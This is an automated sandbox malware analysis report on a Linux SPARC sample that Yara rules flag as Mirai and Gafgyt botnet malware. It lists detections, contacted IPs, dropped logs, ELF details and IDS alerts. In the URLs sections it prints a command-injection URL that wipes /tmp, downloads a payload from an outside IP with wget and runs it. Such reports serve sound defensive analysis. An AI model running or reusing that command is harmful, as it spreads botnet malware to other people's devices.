      Source: Yara matchFile source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected MiraiShow sources
      Source: Yara matchFile source: SLdtSSVlj2, type: SAMPLE
      Source: Yara matchFile source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Yara detected GafgytShow sources
      Source: Yara matchFile source: SLdtSSVlj2, type: SAMPLE
      Source: Yara matchFile source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionHidden Files and Directories1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerSystem Information Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsIngress Tool Transfer3Manipulate Device CommunicationManipulate App Store Rankings or Ratings

      Malware Configuration

      No configs have been found

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553479 Sample: SLdtSSVlj2 Startdate: 15/01/2022 Architecture: LINUX Score: 100 33 5.18.76.220, 60001 ZTELECOM-ASRU Russian Federation 2->33 35 219.103.245.214, 60001 XEPHIONNTT-MECorporationJP Japan 2->35 37 98 other IPs or domains 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected Gafgyt 2->43 45 3 other signatures 2->45 8 SLdtSSVlj2 2->8         started        10 systemd dbus-daemon 2->10         started        13 gvfsd-fuse fusermount 2->13         started        15 37 other processes 2->15 signatures3 process4 signatures5 17 SLdtSSVlj2 8->17         started        19 SLdtSSVlj2 8->19         started        22 SLdtSSVlj2 8->22         started        51 Sample reads /proc/mounts (often used for finding a writable filesystem) 10->51 process6 signatures7 24 SLdtSSVlj2 17->24         started        27 SLdtSSVlj2 17->27         started        29 SLdtSSVlj2 17->29         started        31 SLdtSSVlj2 17->31         started        47 Sample tries to kill multiple processes (SIGKILL) 19->47 process8 signatures9 49 Sample tries to kill multiple processes (SIGKILL) 24->49

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      SLdtSSVlj253%VirustotalBrowse
      SLdtSSVlj263%ReversingLabsLinux.Trojan.Mirai

      Dropped Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jawsfalse
      • Avira URL Cloud: safe
      		unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      156.105.187.203
      		unknownUnited States
      		3549LVLT-3549USfalse
      143.73.37.90
      		unknownUnited States
      		5953DNIC-ASBLK-05800-06055USfalse
      23.112.136.211
      		unknownUnited States
      		7018ATT-INTERNET4USfalse
      65.127.38.165
      		unknownUnited States
      		27235CVC-INET-33USfalse
      8.43.89.79
      		unknownUnited States
      		36154WURESTONUSfalse
      223.7.246.150
      		unknownChina
      		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
      81.53.39.132
      		unknownFrance
      		3215FranceTelecom-OrangeFRfalse
      157.159.2.10
      		unknownFrance
      		2094FR-TELECOM-MANAGEMENT-SUDPARISTelecomManagementSudParifalse
      85.94.181.108
      		unknownAndorra
      		6752ANDORRAAndorraTelecomADfalse
      84.93.195.206
      		unknownUnited Kingdom
      		6871PLUSNETUKInternetServiceProviderGBfalse
      117.53.0.207
      		unknownJapan18136CTAJupiterTelecommunicationsCoLtdJPfalse
      49.142.216.66
      		unknownKorea Republic of
      		7623HCNGYEONGBUK-AS-KRGyeongbukCableTVKRfalse
      98.73.120.251
      		unknownUnited States
      		7018ATT-INTERNET4USfalse
      213.211.198.3
      		unknownGermany
      		43341MDLINKMDlinkonlineservicecenterGmbHDEfalse
      219.103.245.214
      		unknownJapan9595XEPHIONNTT-MECorporationJPfalse
      111.130.217.227
      		unknownChina
      		9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
      4.76.23.211
      		unknownUnited States
      		3356LEVEL3USfalse
      211.10.223.182
      		unknownJapan2516KDDIKDDICORPORATIONJPfalse
      47.99.127.89
      		unknownChina
      		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
      46.116.224.198
      		unknownIsrael
      		1680NV-ASNCELLCOMltdILfalse
      58.4.23.157
      		unknownJapan17506UCOMARTERIANetworksCorporationJPfalse
      195.254.204.141
      		unknownNorway
      		13243AS13243NOfalse
      12.51.215.185
      		unknownUnited States
      		7018ATT-INTERNET4USfalse
      77.38.175.50
      		unknownLatvia
      		20910BALTKOM-ASLVfalse
      141.7.4.238
      		unknownGermany
      		553BELWUEBelWue-KoordinationEUfalse
      106.40.39.9
      		unknownChina
      		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
      153.103.147.76
      		unknownUnited States
      		1519DNIC-AS-01519USfalse
      120.38.218.114
      		unknownChina
      		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
      190.242.223.55
      		unknownColombia
      		23520COLUMBUS-NETWORKSUSfalse
      210.34.243.63
      		unknownChina
      		4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
      109.124.205.206
      		unknownRussian Federation
      		35032TAHIONISP-ASRUfalse
      39.169.69.182
      		unknownChina
      		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
      143.95.243.22
      		unknownUnited States
      		62729ASMALLORANGE1USfalse
      178.48.33.205
      		unknownHungary
      		6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
      118.221.156.95
      		unknownKorea Republic of
      		9318SKB-ASSKBroadbandCoLtdKRfalse
      93.47.233.169
      		unknownItaly
      		12874FASTWEBITfalse
      117.53.204.29
      		unknownKorea Republic of
      		9770SPEEDONSTV-AS-KRLGHelloVisionCorpKRfalse
      106.130.151.96
      		unknownJapan2516KDDIKDDICORPORATIONJPfalse
      53.71.60.182
      		unknownGermany
      		31399DAIMLER-ASITIGNGlobalNetworkDEfalse
      206.189.21.127
      		unknownUnited States
      		14061DIGITALOCEAN-ASNUSfalse
      188.97.76.226
      		unknownGermany
      		3209VODANETInternationalIP-BackboneofVodafoneDEfalse
      139.106.192.0
      		unknownNorway
      		5619EVRY-NOfalse
      167.165.177.98
      		unknownUnited States
      		394534CITYOFCHICAGO-ASN-01USfalse
      24.200.77.29
      		unknownCanada
      		5769VIDEOTRONCAfalse
      47.240.52.241
      		unknownUnited States
      		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
      111.41.154.180
      		unknownChina
      		132525CMNET-HEILONGJIANG-CNHeiLongJiangMobileCommunicationCompfalse
      39.41.6.181
      		unknownPakistan
      		45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKfalse
      97.208.98.77
      		unknownUnited States
      		6167CELLCO-PARTUSfalse
      178.181.134.183
      		unknownPoland
      		12912TMPLfalse
      45.177.55.212
      		unknownEl Salvador
      		267917B-PROINNOVACIONESSADECVSVfalse
      5.18.76.220
      		unknownRussian Federation
      		41733ZTELECOM-ASRUfalse
      136.73.59.246
      		unknownUnited States
      		60311ONEFMCHfalse
      216.14.205.189
      		unknownAustralia
      		18108FUJITSU-APFujitsuAustraliaLtdAUfalse
      206.132.0.140
      		unknownUnited States
      		3561CENTURYLINK-LEGACY-SAVVISUSfalse
      198.63.62.42
      		unknownUnited States
      		2914NTT-COMMUNICATIONS-2914USfalse
      134.106.195.170
      		unknownGermany
      		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
      152.187.199.199
      		unknownUnited States
      		701UUNETUSfalse
      37.192.174.66
      		unknownRussian Federation
      		31200NTKIPv6customersRUfalse
      116.209.105.167
      		unknownChina
      		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
      183.244.15.145
      		unknownChina
      		56048CMNET-BEIJING-APChinaMobileCommunicaitonsCorporationCNfalse
      175.152.186.231
      		unknownChina
      		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
      142.32.230.217
      		unknownCanada
      		3633PROVINCE-OF-BRITISH-COLUMBIACAfalse
      4.89.195.39
      		unknownUnited States
      		3356LEVEL3USfalse
      210.173.247.82
      		unknownJapan4723DOLPHINDolphinJPfalse
      198.248.158.135
      		unknownUnited States
      		20177EMPORIA-STATE-UNIVERSITYUSfalse
      85.240.148.176
      		unknownPortugal
      		3243MEO-RESIDENCIALPTfalse
      62.207.18.187
      		unknownNetherlands
      		1136KPNKPNNationalEUfalse
      170.251.162.210
      		unknownUnited States
      		3573ACCENTUREUSfalse
      36.105.37.71
      		unknownChina
      		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
      138.92.199.12
      		unknownUnited States
      		11482CANISIUS-COLLEGEUSfalse
      155.92.185.225
      		unknownUnited States
      		11500MSOE-INTERNETUSfalse
      77.123.221.2
      		unknownRussian Federation
      		205515TSCRIMEARUfalse
      198.198.81.55
      		unknownUnited States
      		292ESNET-WESTUSfalse
      96.220.159.13
      		unknownUnited States
      		7922COMCAST-7922USfalse
      200.206.126.94
      		unknownBrazil
      		10429TELEFONICABRASILSABRfalse
      98.255.78.152
      		unknownUnited States
      		7922COMCAST-7922USfalse
      170.232.16.113
      		unknownUnited States
      		11685HNBCOL-ASUSfalse
      38.142.127.80
      		unknownUnited States
      		174COGENT-174USfalse
      111.4.64.167
      		unknownChina
      		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
      77.9.31.137
      		unknownGermany
      		6805TDDE-ASN1DEfalse
      140.135.133.43
      		unknownTaiwan; Republic of China (ROC)
      		1659ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationCfalse
      147.20.20.62
      		unknownUnited States
      		10796TWC-10796-MIDWESTUSfalse
      130.119.254.111
      		unknownUnited States
      		22284AS22284-DOI-OPSUSfalse
      222.93.139.47
      		unknownChina
      		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
      156.115.201.253
      		unknownSwitzerland
      		59630NN_INSURANCE_EURASIA_NV_ITH-ASNLfalse
      154.27.167.245
      		unknownUnited States
      		174COGENT-174USfalse
      58.146.33.202
      		unknownJapan17529MEDIACATSTARCATCABLENETWORKCoLTDJPfalse
      27.142.144.254
      		unknownJapan9824JTCL-JP-ASJupiterTelecommunicationCoLtdJPfalse
      120.72.61.112
      		unknownChina
      		10002ICTIGAUENOCABLETELEVISIONCOLTDJPfalse
      143.197.76.38
      		unknownUnited States
      		32480LLUMCUSfalse
      44.223.80.47
      		unknownUnited States
      		14618AMAZON-AESUSfalse
      73.211.187.52
      		unknownUnited States
      		7922COMCAST-7922USfalse
      162.179.208.90
      		unknownUnited States
      		21928T-MOBILE-AS21928USfalse
      210.143.214.206
      		unknownJapan2516KDDIKDDICORPORATIONJPfalse
      92.185.105.33
      		unknownFrance
      		12479UNI2-ASESfalse
      66.71.205.67
      		unknownUnited States
      		14438USA-CHOICE-OIL-CITYUSfalse
      119.153.46.164
      		unknownPakistan
      		45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKfalse
      219.128.232.14
      		unknownChina
      		58543CHINATELECOM-GUANGDONG-IDCGuangdongCNfalse
      39.87.126.183
      		unknownChina
      		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
      52.144.33.89
      		unknownUnited States
      		63242AS-CMN-LSUSfalse

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      /var/lib/whoopsie/whoopsie-id.02WAG1
      Process:/usr/bin/whoopsie
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):128
      Entropy (8bit):3.9410969045919657
      Encrypted:false
      SSDEEP:3:19y6UTAvBTdDVEQcNgAT0XUQhd3tjCZccCKcsVQWQ7JW:3y6BlVEfQXU8djCZd40
      MD5:D2B5AAF22916F8D6665CF9E835EAD5E7
      SHA1:AAEF3CE527B8F1E3733BCD03EF7A6C0F30881E15
      SHA-256:FEB925D4465BF6D30A42B19112406AD1B59BA90673DC4F91B25005A90FEFEB36
      SHA-512:B55A45FA0DECE5A3B0348BC3F3031A7329590E57BAD5013690AFEAA9825C0DE4B75D27057A56C33800F1626935840DA2262AAF14E795C75F39362B728D95F18A
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: 9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e
      /var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/system.journal
      Process:/lib/systemd/systemd-journald
      File Type:data
      Category:dropped
      Size (bytes):240
      Entropy (8bit):1.448047321524811
      Encrypted:false
      SSDEEP:3:F31HliKvW/2kl/kKvW/28t:F382Mq2
      MD5:1F60EDD49E4CC1F1C0792598C47673FA
      SHA1:4C16C1F5A759EB4FDBE7B01AD2ED803ED9A4BFBE
      SHA-256:26B3CA0968676A85209D40A14518C6575107A98B9C8A221A4944C8CBED9E1C84
      SHA-512:EBDCE2356260F4A23891661120C8F9059981B30A77DE3BD45374CFBF4EF481489E3F3BF3B70CBFC342EF6976668F2C8AFB0627087490C19DA6FFA26EFB2B7861
      Malicious:false
      Reputation:low
      Preview: LPKSHHRH..................Y..>Jn.....S.%..................................Y..>Jn.....S.%........................................................................................................................................................
      /var/log/kern.log
      Process:/usr/sbin/rsyslogd
      File Type:ASCII text, with very long lines
      Category:dropped
      Size (bytes):6846
      Entropy (8bit):5.002979720194877
      Encrypted:false
      SSDEEP:96:vqXAOy+f2Be+4Dv0qRWOr8Mohr0BYHOq02IFgMB4igbEjSOf3eBiqqI5VOSPNpvV:Slr8+2Oc489CUR1VzbXw76lix4Rf
      MD5:B9F6472066B066D02172E7FF077E33E6
      SHA1:0039EA72C2CAA81875220FDA6C7B9F68E9FCBFBA
      SHA-256:437A5CC5B4FFEA465AFA4917112703FF39623CF0C5BEBB3C1C6057E540C35E66
      SHA-512:33ACE561E4A1E24A1D933CBB84C0C062EB6252C47A233EF347DA62CDF0ED5358390B1AFAC6C4B6B5811CBBB45DF21A3F7FDE73593CBFD017B7A585BCD5BE3823
      Malicious:false
      Reputation:low
      Preview: Jan 15 00:45:13 galassia kernel: [ 421.001790] blocking signal 9: 5275 -> 797.Jan 15 00:45:13 galassia kernel: [ 421.501666] blocking signal 9: 5275 -> 936.Jan 15 00:45:13 galassia kernel: [ 421.613716] blocking signal 9: 5275 -> 1320.Jan 15 00:45:13 galassia kernel: [ 421.641574] blocking signal 9: 5275 -> 1334.Jan 15 00:45:13 galassia kernel: [ 421.663883] blocking signal 9: 5275 -> 1335.Jan 15 00:45:13 galassia kernel: [ 421.717290] blocking signal 9: 5275 -> 1389.Jan 15 00:45:13 galassia kernel: [ 421.940054] blocking signal 9: 5275 -> 1809.Jan 15 00:45:13 galassia kernel: [ 421.963486] blocking signal 9: 5275 -> 1860.Jan 15 00:45:13 galassia kernel: [ 421.986779] blocking signal 9: 5275 -> 1872.Jan 15 00:45:13 galassia kernel: [ 422.025092] blocking signal 9: 5275 -> 1983.Jan 15 00:45:13 galassia kernel: [ 422.084078] ------------[ cut here ]------------.Jan 15 00:45:13 galassia kernel: [ 422.084080] kernel_write_unchecked failed with: -512.Jan 15 00:45:13 galassia ker
      /var/log/syslog
      Process:/usr/sbin/rsyslogd
      File Type:ASCII text, with very long lines
      Category:dropped
      Size (bytes):10480
      Entropy (8bit):5.088105719006059
      Encrypted:false
      SSDEEP:192:SIWer8+2Oca89CUR1VzbXw76lix4EuR7qS0z8+bn9NuvBc0m7+T:cAMOca89CUR1V/Xw76lix4EuR7qS0z8F
      MD5:8B294A410842F553E7CD8ACACF921685
      SHA1:27011FBC6B8F3310370F33D1D447E81420FB0146
      SHA-256:15942910CC4EF577C8F7A7C58BC96EEDF31DE38D70511B66C090335562F6DC40
      SHA-512:29247114A51E64C2307DC7B22BE783E771A82CC503E5D1C5A93719D50BD3DB6BCACBE39F57D71EA56EF8C18345A8978F2DD42A16903DFA1FF4F755951F12094D
      Malicious:false
      Reputation:low
      Preview: Jan 15 00:45:13 galassia kernel: [ 420.866175] systemd[1]: rsyslog.service: Main process exited, code=killed, status=9/KILL.Jan 15 00:45:13 galassia kernel: [ 420.866288] systemd[1]: rsyslog.service: Failed with result 'signal'..Jan 15 00:45:13 galassia kernel: [ 421.001790] blocking signal 9: 5275 -> 797.Jan 15 00:45:13 galassia kernel: [ 421.075601] systemd[1]: rsyslog.service: Scheduled restart job, restart counter is at 1..Jan 15 00:45:13 galassia kernel: [ 421.075622] systemd[1]: Stopped System Logging Service..Jan 15 00:45:13 galassia kernel: [ 421.077046] systemd[1]: Starting System Logging Service....Jan 15 00:45:13 galassia kernel: [ 421.501666] blocking signal 9: 5275 -> 936.Jan 15 00:45:13 galassia kernel: [ 421.613716] blocking signal 9: 5275 -> 1320.Jan 15 00:45:13 galassia kernel: [ 421.641574] blocking signal 9: 5275 -> 1334.Jan 15 00:45:13 galassia kernel: [ 421.663883] blocking signal 9: 5275 -> 1335.Jan 15 00:45:13 galassia kernel: [ 421.717290] blocking si

      Static File Info

      General

      File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
      Entropy (8bit):6.137666783957336
      TrID:
      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
      File name:SLdtSSVlj2
      File size:87664
      MD5:6b355f508658f7fbe9c91fad5d09d6b5
      SHA1:72a9d43e568016e0384a39e391391498695328bd
      SHA256:9010857d2724b141fc1ccc742e9d5d41ff50e102878d196fd9726458b0864c19
      SHA512:a9cab0b7fd2ff29f3e5d585d504f4ca2d991dff56829fde45695c819a57e7f9a5afb3ebe8e6e84ba3f75022006c216dbe405a80af33f3e75504f4c2fba4114e4
      SSDEEP:1536:iRbOxiKmmrxvErU5J9JJL4aymGuxwOWPnhIm2K09YZnZSZ55ESUJ:iJOxvlrxsXaywk72KmGZ65WR
      File Content Preview:.ELF...........................4..T......4. ...(......................Rh..Rh..............Rl..Rl..Rl...4............dt.Q................................@..(....@.J.................#.....`...`.....!....."...@.....".........`......$"..."...@...........`....

      Static ELF Info

      ELF header

      Class:ELF32
      Data:2's complement, big endian
      Version:1 (current)
      Machine:Sparc
      Version Number:0x1
      Type:EXEC (Executable file)
      OS/ABI:UNIX - System V
      ABI Version:0
      Entry Point Address:0x101a4
      Flags:0x0
      ELF Header Size:52
      Program Header Offset:52
      Program Header Size:32
      Number of Program Headers:3
      Section Header Offset:87264
      Section Header Size:40
      Number of Section Headers:10
      Header String Table Index:9

      Sections

      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
      NULL0x00x00x00x00x0000
      .initPROGBITS0x100940x940x1c0x00x6AX004
      .textPROGBITS0x100b00xb00x12ba40x00x6AX004
      .finiPROGBITS0x22c540x12c540x140x00x6AX004
      .rodataPROGBITS0x22c680x12c680x26000x00x2A008
      .ctorsPROGBITS0x3526c0x1526c0x80x00x3WA004
      .dtorsPROGBITS0x352740x152740x80x00x3WA004
      .dataPROGBITS0x352800x152800x2200x00x3WA008
      .bssNOBITS0x354a00x154a00x5c80x00x3WA008
      .shstrtabSTRTAB0x00x154a00x3e0x00x0001

      Program Segments

      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
      LOAD0x00x100000x100000x152680x152683.71590x5R E0x10000.init .text .fini .rodata
      LOAD0x1526c0x3526c0x3526c0x2340x7fc1.69340x6RW 0x10000.ctors .dtors .data .bss
      GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

      Network Behavior

      Snort IDS Alerts

      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
      01/15/22-00:45:03.644597ICMP399ICMP Destination Unreachable Host Unreachable64.89.161.25192.168.2.23
      01/15/22-00:45:03.662995ICMP449ICMP Time-To-Live Exceeded in Transit66.181.240.243192.168.2.23
      01/15/22-00:45:04.140958ICMP399ICMP Destination Unreachable Host Unreachable10.63.5.86192.168.2.23
      01/15/22-00:45:04.500114ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.46.13.8192.168.2.23
      01/15/22-00:45:04.502104ICMP485ICMP Destination Unreachable Communication Administratively Prohibited89.245.72.163192.168.2.23
      01/15/22-00:45:04.519542ICMP402ICMP Destination Unreachable Port Unreachable31.179.111.91192.168.2.23
      01/15/22-00:45:04.719775ICMP449ICMP Time-To-Live Exceeded in Transit72.165.9.129192.168.2.23
      01/15/22-00:45:04.750848ICMP402ICMP Destination Unreachable Port Unreachable103.126.144.49192.168.2.23
      01/15/22-00:45:04.767990ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited153.127.55.217192.168.2.23
      01/15/22-00:45:04.786693ICMP449ICMP Time-To-Live Exceeded in Transit14.141.63.186192.168.2.23
      01/15/22-00:45:05.699184ICMP402ICMP Destination Unreachable Port Unreachable191.183.77.70192.168.2.23
      01/15/22-00:45:06.500429ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited118.107.66.183192.168.2.23
      01/15/22-00:45:06.518024ICMP399ICMP Destination Unreachable Host Unreachable77.239.139.110192.168.2.23
      01/15/22-00:45:06.542204ICMP485ICMP Destination Unreachable Communication Administratively Prohibited79.205.220.52192.168.2.23
      01/15/22-00:45:06.660580ICMP401ICMP Destination Unreachable Network Unreachable119.15.135.78192.168.2.23
      01/15/22-00:45:06.708590ICMP485ICMP Destination Unreachable Communication Administratively Prohibited68.186.64.241192.168.2.23
      01/15/22-00:45:06.734233ICMP402ICMP Destination Unreachable Port Unreachable144.123.13.90192.168.2.23
      01/15/22-00:45:06.806563ICMP485ICMP Destination Unreachable Communication Administratively Prohibited103.217.108.13192.168.2.23
      01/15/22-00:45:06.809870ICMP399ICMP Destination Unreachable Host Unreachable218.150.7.98192.168.2.23
      01/15/22-00:45:06.910095ICMP449ICMP Time-To-Live Exceeded in Transit170.247.115.122192.168.2.23
      01/15/22-00:45:06.972641ICMP449ICMP Time-To-Live Exceeded in Transit202.112.31.181192.168.2.23
      01/15/22-00:45:07.639423ICMP449ICMP Time-To-Live Exceeded in Transit154.54.6.89192.168.2.23
      01/15/22-00:45:07.651790ICMP399ICMP Destination Unreachable Host Unreachable75.10.169.149192.168.2.23
      01/15/22-00:45:07.748393ICMP399ICMP Destination Unreachable Host Unreachable112.188.10.2192.168.2.23
      01/15/22-00:45:08.132852ICMP399ICMP Destination Unreachable Host Unreachable83.33.246.134192.168.2.23
      01/15/22-00:45:08.530722ICMP449ICMP Time-To-Live Exceeded in Transit159.171.80.147192.168.2.23
      01/15/22-00:45:08.547378ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.153.189.171192.168.2.23
      01/15/22-00:45:08.619940ICMP485ICMP Destination Unreachable Communication Administratively Prohibited50.242.148.249192.168.2.23
      01/15/22-00:45:08.624918ICMP399ICMP Destination Unreachable Host Unreachable216.115.200.170192.168.2.23
      01/15/22-00:45:08.654174ICMP401ICMP Destination Unreachable Network Unreachable84.17.32.179192.168.2.23
      01/15/22-00:45:09.560025ICMP485ICMP Destination Unreachable Communication Administratively Prohibited188.101.52.88192.168.2.23
      01/15/22-00:45:09.571101ICMP485ICMP Destination Unreachable Communication Administratively Prohibited95.244.186.55192.168.2.23
      01/15/22-00:45:09.658114ICMP399ICMP Destination Unreachable Host Unreachable38.32.13.210192.168.2.23
      01/15/22-00:45:09.673556ICMP485ICMP Destination Unreachable Communication Administratively Prohibited76.108.107.125192.168.2.23
      01/15/22-00:45:09.691894ICMP449ICMP Time-To-Live Exceeded in Transit150.181.28.26192.168.2.23
      01/15/22-00:45:09.944855ICMP449ICMP Time-To-Live Exceeded in Transit103.31.156.141192.168.2.23
      01/15/22-00:45:10.144783ICMP399ICMP Destination Unreachable Host Unreachable153.35.122.230192.168.2.23
      01/15/22-00:45:10.442048ICMP399ICMP Destination Unreachable Host Unreachable58.159.231.38192.168.2.23
      01/15/22-00:45:10.527284ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited206.189.21.127192.168.2.23
      01/15/22-00:45:10.637759ICMP449ICMP Time-To-Live Exceeded in Transit208.95.70.33192.168.2.23
      01/15/22-00:45:10.656617ICMP399ICMP Destination Unreachable Host Unreachable162.144.240.15192.168.2.23
      01/15/22-00:45:10.667618ICMP449ICMP Time-To-Live Exceeded in Transit216.244.88.167192.168.2.23
      01/15/22-00:45:10.675946ICMP399ICMP Destination Unreachable Host Unreachable108.189.77.136192.168.2.23
      01/15/22-00:45:10.677880ICMP449ICMP Time-To-Live Exceeded in Transit212.200.42.153192.168.2.23
      01/15/22-00:45:10.718550ICMP449ICMP Time-To-Live Exceeded in Transit66.28.4.38192.168.2.23
      01/15/22-00:45:10.727803ICMP399ICMP Destination Unreachable Host Unreachable64.59.80.57192.168.2.23
      01/15/22-00:45:10.770073ICMP449ICMP Time-To-Live Exceeded in Transit38.142.43.90192.168.2.23
      01/15/22-00:45:10.864538ICMP399ICMP Destination Unreachable Host Unreachable86.159.98.192192.168.2.23
      01/15/22-00:45:10.871674ICMP399ICMP Destination Unreachable Host Unreachable24.25.231.241192.168.2.23
      01/15/22-00:45:11.535106ICMP485ICMP Destination Unreachable Communication Administratively Prohibited188.97.76.226192.168.2.23
      01/15/22-00:45:11.546183ICMP399ICMP Destination Unreachable Host Unreachable94.53.25.118192.168.2.23
      01/15/22-00:45:11.548777ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited185.163.106.189192.168.2.23
      01/15/22-00:45:11.648176ICMP449ICMP Time-To-Live Exceeded in Transit4.28.96.162192.168.2.23
      01/15/22-00:45:11.728288ICMP449ICMP Time-To-Live Exceeded in Transit89.202.172.245192.168.2.23
